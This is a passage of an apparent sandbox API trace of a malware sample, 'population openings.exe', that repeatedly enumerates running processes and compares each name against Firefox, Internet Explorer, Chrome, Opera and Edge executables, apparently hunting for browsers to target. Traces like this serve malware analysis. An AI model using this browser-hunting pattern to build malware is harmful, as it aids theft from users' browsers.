(lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0215.740] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.741] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0215.741] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0215.741] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0215.741] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0215.741] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.742] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.742] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.742] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.742] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.742] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.742] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0215.742] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0215.742] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0215.743] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0215.743] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0215.743] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.743] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.743] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.743] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.743] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0215.743] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.744] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0215.744] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0215.744] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0215.744] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0215.744] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.744] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.744] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.744] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.744] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0215.744] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0215.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0215.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0215.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0215.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.745] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.746] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0215.746] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0215.746] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0215.746] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0215.746] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.746] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.746] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.746] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.746] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0215.746] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.747] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0215.748] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0215.749] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0215.749] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0215.749] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0215.749] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0215.749] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0215.749] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0215.750] CloseHandle (hObject=0xe8) returned 1 [0215.750] Sleep (dwMilliseconds=0x3e8) [0216.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0216.758] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.758] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0216.758] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0216.758] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0216.758] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0216.758] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0216.758] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.759] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0216.759] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0216.759] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0216.759] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0216.759] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0216.759] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.760] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0216.760] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0216.760] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0216.760] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0216.760] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.760] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.760] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0216.760] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0216.760] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0216.760] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0216.760] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.760] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.761] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0216.761] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0216.761] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0216.761] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0216.761] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.761] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0216.761] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0216.761] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0216.761] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0216.761] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.762] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0216.762] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0216.762] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0216.762] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0216.762] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.762] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.762] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0216.762] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0216.762] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0216.763] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0216.763] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.763] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.763] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0216.763] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0216.763] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0216.763] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0216.763] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.763] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.764] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0216.764] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0216.764] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0216.764] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0216.764] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.764] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.764] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.764] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.764] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.764] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.764] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.764] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.765] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.765] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.765] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.766] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.766] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.766] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.766] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.766] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.766] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.767] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.767] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.767] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.767] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.767] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.767] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.767] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0216.767] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0216.767] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0216.767] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0216.767] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.767] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.768] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.768] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.768] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.769] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0216.769] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0216.769] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0216.769] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0216.769] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.769] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.769] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0216.769] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0216.769] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0216.769] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0216.770] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.770] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.770] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0216.770] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0216.770] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0216.770] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0216.770] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.770] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.771] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.771] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.771] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.771] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0216.771] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.771] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.771] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0216.771] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0216.771] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0216.771] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0216.771] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.771] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 